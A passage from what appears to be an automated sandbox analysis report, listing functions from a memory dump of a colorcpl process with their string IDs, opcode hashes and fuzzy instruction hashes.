                                                                                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                          • Instruction Fuzzy Hash: 55C1E2712083429BDB15CF28C945B2BBBE5EFD4358F044A2CFA9ACB291D778D505CB61
                                                                                                                                          Function 2279E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                                          • Opcode ID: 9df8f64df6416e796aa87d5eeda82330f88a320213bf4545e6da317e7b4000ec
                                                                                                                                          • Instruction ID: 9dea25fdadc4cecb45678684b8ee62c91e397719afd7987fe87357b1a5103355
                                                                                                                                          • Opcode Fuzzy Hash: 9df8f64df6416e796aa87d5eeda82330f88a320213bf4545e6da317e7b4000ec
                                                                                                                                          • Instruction Fuzzy Hash: A2617971E087089FDB15CFA8DA81FAEBBB5FB48704F50412AE648EB251D731A940CB50
                                                                                                                                          Function 227C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$MUI
                                                                                                                                          • API String ID: 0-17815947
                                                                                                                                          • Opcode ID: d20e1393bd215a4e68358b99e4ae5640dae81390c1b05475ede3f7286c862fab
                                                                                                                                          • Instruction ID: e7ce706389b04eb5f4c85dab9516555c9c2d285acfbb00f633f123061f9c55b4
                                                                                                                                          • Opcode Fuzzy Hash: d20e1393bd215a4e68358b99e4ae5640dae81390c1b05475ede3f7286c862fab
                                                                                                                                          • Instruction Fuzzy Hash: 5C513971E0431DAEDB12CFA5CD94EEEBBB8EB54754F100529EA11B7290D7709E05CBA0
                                                                                                                                          Function 2275A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                                                          • Opcode ID: de773943236057cc038da91c99c03f4460f259c3dad8826a70b973a055f5c6f7
                                                                                                                                          • Instruction ID: a0a1e01da4a93eea930896cd71b72bc06685a45cb7deac8c9e4c22b1e77e0bc5
                                                                                                                                          • Opcode Fuzzy Hash: de773943236057cc038da91c99c03f4460f259c3dad8826a70b973a055f5c6f7
                                                                                                                                          • Instruction Fuzzy Hash: FB01F4B2648740AFE311CF24CD85F26B7E8EB54719F018939AA58C72D0E338D818CB46
                                                                                                                                          Function 2272C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: MUI
                                                                                                                                          • API String ID: 0-1339004836
                                                                                                                                          • Opcode ID: 88bf4191e90b764201fecfbdb100e5dfd70b148473e33c64bd9851fbd5439287
                                                                                                                                          • Instruction ID: 98cdee63349fa9ccde80eb1bfffc4daea7ce462ba61a270a584ff80b4af2c5d8
                                                                                                                                          • Opcode Fuzzy Hash: 88bf4191e90b764201fecfbdb100e5dfd70b148473e33c64bd9851fbd5439287
                                                                                                                                          • Instruction Fuzzy Hash: 77826C75E08B188FDB24CFA9C980BEDB7B1FF58354F11826AE919AB351D7309981CB50
                                                                                                                                          Function 227A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                          • Opcode ID: 397744f19132db87aa0e5bac8f591060a06732db60c42d8a67f4ab3517ecd7ea
                                                                                                                                          • Instruction ID: ba7ea1e7e3b01d618b0b8fb634aaf4784525a0b36cb85cbe6156616e79ab7c34
                                                                                                                                          • Opcode Fuzzy Hash: 397744f19132db87aa0e5bac8f591060a06732db60c42d8a67f4ab3517ecd7ea
                                                                                                                                          • Instruction Fuzzy Hash: 74916171A45319AFEB22DF94CD95FAE7BB8EF18754F100165F700AB291DA74AD00CBA0
                                                                                                                                          Function 227CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                          • Opcode ID: 8bc7c5b2361ca9890d2eb5368de506aa797418bc23856f712f2007eb75026b03
                                                                                                                                          • Instruction ID: bc4ea83dca6241935b755a0712ec2b1daa0c02d28fbc69cb819c0e8eb3f1a6e1
                                                                                                                                          • Opcode Fuzzy Hash: 8bc7c5b2361ca9890d2eb5368de506aa797418bc23856f712f2007eb75026b03
                                                                                                                                          • Instruction Fuzzy Hash: 7291B132909748BBDB239FA4DD48FAFBBB9EF85744F100029F900A7251EB749941CB91
                                                                                                                                          Function 2275A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: GlobalTags
                                                                                                                                          • API String ID: 0-1106856819
                                                                                                                                          • Opcode ID: f9613c5aa73c3194eb18bfa3182443baa1bc92239c074878a7942b0f6141c64d
                                                                                                                                          • Instruction ID: d6dbdc9903c1a20a596a38eb07af2477de10b75775ddbe8e16e9c7d22f2a253f
                                                                                                                                          • Opcode Fuzzy Hash: f9613c5aa73c3194eb18bfa3182443baa1bc92239c074878a7942b0f6141c64d
                                                                                                                                          • Instruction Fuzzy Hash: 30718C75E0834ADFDB18CFA8E691A9DBBB1BF58704F10822AE905A7341EB359901CF50
                                                                                                                                          Function 227C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: .mui
                                                                                                                                          • API String ID: 0-1199573805
                                                                                                                                          • Opcode ID: 7dff067ba323be67d993440a019c69f72da52ba882ffc66814cc4805ea8b350d
                                                                                                                                          • Instruction ID: 641ccaa0b952da225c2b40dcae6fee9bb712c85ccb331c3f41b943e67871476e
                                                                                                                                          • Opcode Fuzzy Hash: 7dff067ba323be67d993440a019c69f72da52ba882ffc66814cc4805ea8b350d
                                                                                                                                          • Instruction Fuzzy Hash: CA519F72D09729DFCF11CFA8C954AAEBBB4AF08B04F05417AEA11BB250D7348D01DBA4
                                                                                                                                          Function 2273E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: EXT-
                                                                                                                                          • API String ID: 0-1948896318
                                                                                                                                          • Opcode ID: 362eff65e96bc21a4911cfe62017aa90b8da5feeeca2314436235f08f2fe8c57
                                                                                                                                          • Instruction ID: bffb8400f80cae1156a9137463cbd755f33fdb5a4427b272841eb08ce327b3d4
                                                                                                                                          • Opcode Fuzzy Hash: 362eff65e96bc21a4911cfe62017aa90b8da5feeeca2314436235f08f2fe8c57
                                                                                                                                          • Instruction Fuzzy Hash: E441BF7250D3169BD712CB70C984F6BB7E8AF88718F400A2DFA84E7182EA34C904C793
                                                                                                                                          Function 2279C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: BinaryHash
                                                                                                                                          • API String ID: 0-2202222882
                                                                                                                                          • Opcode ID: a5c586668345145726b5d1b717139a9bd424c1c6ca50d752829876764a14f23d
                                                                                                                                          • Instruction ID: 6e1c3bf6fc7cb7a8bd0a867d68dc8d34f3d4cb568874e4a5d08a2bcd755b1bea
                                                                                                                                          • Opcode Fuzzy Hash: a5c586668345145726b5d1b717139a9bd424c1c6ca50d752829876764a14f23d
                                                                                                                                          • Instruction Fuzzy Hash: 9C4141B1D0532DEADF21CB60DC85FEE777CAB55714F0045E9AA08AB140DB709E888BA5
                                                                                                                                          Function 227B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: #
                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                          • Opcode ID: 58765d9909157f73cc7fceab11f03ffbaef81449c84313cb58489ae1a6dbcb2f
                                                                                                                                          • Instruction ID: dfc29e989227a548709e7f35657896e6abc6a064d3ad052914763925afd02ad3
                                                                                                                                          • Opcode Fuzzy Hash: 58765d9909157f73cc7fceab11f03ffbaef81449c84313cb58489ae1a6dbcb2f
                                                                                                                                          • Instruction Fuzzy Hash: 4A313531A097589BDB22CF68C854BEE77F8DF05709F504068EA40AB282CB79ED05CB90
                                                                                                                                          Function 2279CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: BinaryName
                                                                                                                                          • API String ID: 0-215506332
                                                                                                                                          • Opcode ID: 4be9502124086cdf1268934ec6fa848022e4a4a450aa3a4849fc6f0643a60113
                                                                                                                                          • Instruction ID: e15fbe1b1e47c406850a245a7a9bd0467c5418f04bf1fce221384e32f9c17db3
                                                                                                                                          • Opcode Fuzzy Hash: 4be9502124086cdf1268934ec6fa848022e4a4a450aa3a4849fc6f0643a60113
                                                                                                                                          • Instruction Fuzzy Hash: CE310336A09755EFEF16CB58D945E6FBB74EB88760F01416DA914AB290D7309E00CBE0
                                                                                                                                          Function 227A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 227A895E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                          • API String ID: 0-702105204
                                                                                                                                          • Opcode ID: 55f2712b692c1020e8cffff42fe9a0e0e8ac7864dd6721d5a0b0d2e52cb68f13
                                                                                                                                          • Instruction ID: 9f53c3bb0dfb99824e5b8bcff11ed0a9e8cf6287a3557c6cb0587366691464ad
                                                                                                                                          • Opcode Fuzzy Hash: 55f2712b692c1020e8cffff42fe9a0e0e8ac7864dd6721d5a0b0d2e52cb68f13
                                                                                                                                          • Instruction Fuzzy Hash: C501F736208300DBE7255A55C9ECE56BFA5FF85374B800728E68517595CB28A881C6D2
                                                                                                                                          Function 227C2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 23ac363601a0ecd45d2ad147894b96dbad209fbfc425d1b1a3decea250f5109a
                                                                                                                                          • Instruction ID: 84506936f366cce2be9c81bc2fb87c5c40634c4a9bf52e13bcf8c2b4c6f1cbea
                                                                                                                                          • Opcode Fuzzy Hash: 23ac363601a0ecd45d2ad147894b96dbad209fbfc425d1b1a3decea250f5109a
                                                                                                                                          • Instruction Fuzzy Hash: 4B42EC3260C3419BD716CF78C990B6BB7E5AFA8B04F44093DFA8297261DBB0D945CB52
                                                                                                                                          Function 227B8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e47bd59fad67634989e7b5304406045e038e302e84fbcba5a2f2195a5b503f6a
                                                                                                                                          • Instruction ID: 5d127e0a7ab3cd77a0b3c48b7fcc8dc1a9d6743165bb0e7f52fa1ea51cb009c8
                                                                                                                                          • Opcode Fuzzy Hash: e47bd59fad67634989e7b5304406045e038e302e84fbcba5a2f2195a5b503f6a
                                                                                                                                          • Instruction Fuzzy Hash: 2B426A75E143198FDB25CF69C881BAEB7F5BF88304F548199E948EB242DB349981CF60
                                                                                                                                          Function 22732840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 28078f7ff156b59779c4ee9092a8b017514c46f6dee1c6505e81903cd2d3f7e2
                                                                                                                                          • Instruction ID: c6793d2f71383df19bfe1bf69d5d82a802c1b42b7b965e98a4acf18479daa59a
                                                                                                                                          • Opcode Fuzzy Hash: 28078f7ff156b59779c4ee9092a8b017514c46f6dee1c6505e81903cd2d3f7e2
                                                                                                                                          • Instruction Fuzzy Hash: 1D325470A08755EFDB15CF65C944BAEBBF2BF84304F20421DD58AAB285DB34A902DF52
                                                                                                                                          Function 227CA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0b9e505ecc4570401c109c3c81e879ac616957d47b3705fe064a0da6ad7a2dbf
                                                                                                                                          • Instruction ID: 287aff7f53c9db508e8abe39f4d6a30dec56f1bdfa094a6cbde936bd8c954040
                                                                                                                                          • Opcode Fuzzy Hash: 0b9e505ecc4570401c109c3c81e879ac616957d47b3705fe064a0da6ad7a2dbf
                                                                                                                                          • Instruction Fuzzy Hash: 5222FF706087618BDB14CF39C190B72B7F1BF4434AF54859AEA869F286E33DE552CB60
                                                                                                                                          Function 22726A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 440953c27a4273bcb2b272bd01f9008318a79a5840880cdf33dad81ca0bc4cbd
                                                                                                                                          • Instruction ID: ce50ec485486b68d0519a0f4da7c3ccc91bc89ac47a82eefb7859db143cb78ca
                                                                                                                                          • Opcode Fuzzy Hash: 440953c27a4273bcb2b272bd01f9008318a79a5840880cdf33dad81ca0bc4cbd
                                                                                                                                          • Instruction Fuzzy Hash: BB327671A09704CFCB15CF69C580B9AB7F1FF48304F20866AE959AB6A2D734ED41CB91
                                                                                                                                          Function 22744A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                          • Instruction ID: 676534e73a8a6db78efb6f635fc4e034d98920e3735c6abb42b6ae0c1937e3eb
                                                                                                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                          • Instruction Fuzzy Hash: 7CF17E70E093199BDB15CFA5C5A0BAEBBF5BF48714F048129EA04EB341EB34D941EB61
                                                                                                                                          Function 227B892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fef2e3851ccaf1db7e3cfb451a3f25b842f6562525eba4dc5ac5006626a12dcc
                                                                                                                                          • Instruction ID: e465a602e3795e9a08949a2ee12023c801770e43a087a03c911bcc176411c46d
                                                                                                                                          • Opcode Fuzzy Hash: fef2e3851ccaf1db7e3cfb451a3f25b842f6562525eba4dc5ac5006626a12dcc
                                                                                                                                          • Instruction Fuzzy Hash: 57D1E371E097098BDB05CF69C841BEFB7F1AF88304F98826AD955E7241D739EA05CB60
                                                                                                                                          Function 227265D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 83810d49d509d4fbbfafa9699562174fb43507633bbc45b601e1522663c9fb13
                                                                                                                                          • Instruction ID: 7228c9aa269d9b2f202b3a41df74b65277250e09607fee6d611160fb0b8fc9b3
                                                                                                                                          • Opcode Fuzzy Hash: 83810d49d509d4fbbfafa9699562174fb43507633bbc45b601e1522663c9fb13
                                                                                                                                          • Instruction Fuzzy Hash: 5DE16A7160D742CFC305CF28C590A5ABBE0BF89318F458A6EE99997351DB31EE05CB92
                                                                                                                                          Function 22718397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 27a14c84c91e8ccaae367e95da6f93a1d9660debdc165a5a9acf053ef11459d2
                                                                                                                                          • Instruction ID: eda5fbec12a4a8237e896632c32e68e78c476f19c4cdd755a4a96a4d5813040b
                                                                                                                                          • Opcode Fuzzy Hash: 27a14c84c91e8ccaae367e95da6f93a1d9660debdc165a5a9acf053ef11459d2
                                                                                                                                          • Instruction Fuzzy Hash: 6ED1E171A08716DBEB05CF64C981FAA77F5FF54318F844629EA25EB281EB34DA40CB50
                                                                                                                                          Function 227A8243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                          • Instruction ID: 6ef6d9f01b924198ad31e86a8c06312cb492d17608c79a2a60de8fdce80cb512
                                                                                                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                          • Instruction Fuzzy Hash: 38B1B275A047049FDB15DF95CA64FABBBB9FF84324F90462DAA01A7290DB30ED05CB50
                                                                                                                                          Function 22730535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                          • Instruction ID: 20562b5f9094b61a15661a61f9c77a9862a954826e14e19202ac0fac947e7b8c
                                                                                                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                          • Instruction Fuzzy Hash: B8B11732A087559FDB12CB64C950FAEBBF6AF84304F1402A9E651EB382DB70D941DB91
                                                                                                                                          Function 227283C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2f8be1035c34cdd362023a6c25278f57d5c15ef94f6876b80998da1a059ca60c
                                                                                                                                          • Instruction ID: c7dde5ef7fc190eabc2a3a68ab5b0947138ba42db54055c98987bcd87f231e27
                                                                                                                                          • Opcode Fuzzy Hash: 2f8be1035c34cdd362023a6c25278f57d5c15ef94f6876b80998da1a059ca60c
                                                                                                                                          • Instruction Fuzzy Hash: 93C15874108381CFD764CF15C594BABB7E5BF88304F404A6DE98997291D775EA08CFA2
                                                                                                                                          Function 2271C427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e5b2605f566e37ef8823acb4f730458d89f6fd811caa3b371021d416b05c7e57
                                                                                                                                          • Instruction ID: 7c7df0cf85848426732513b497ae5adb67034e3bfd1bd9535b425e7f4ccd6b74
                                                                                                                                          • Opcode Fuzzy Hash: e5b2605f566e37ef8823acb4f730458d89f6fd811caa3b371021d416b05c7e57
                                                                                                                                          • Instruction Fuzzy Hash: C1B17F70A083658BDB25CF64C990BA9B3B1EF44704F1085EDD50AEB281EB74DE85DB21
                                                                                                                                          Function 2274E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8f5df0e2ddcc62e2bf2d7daaa5abf24c8e96ee8604da25c3b5942e42bb4b2fab
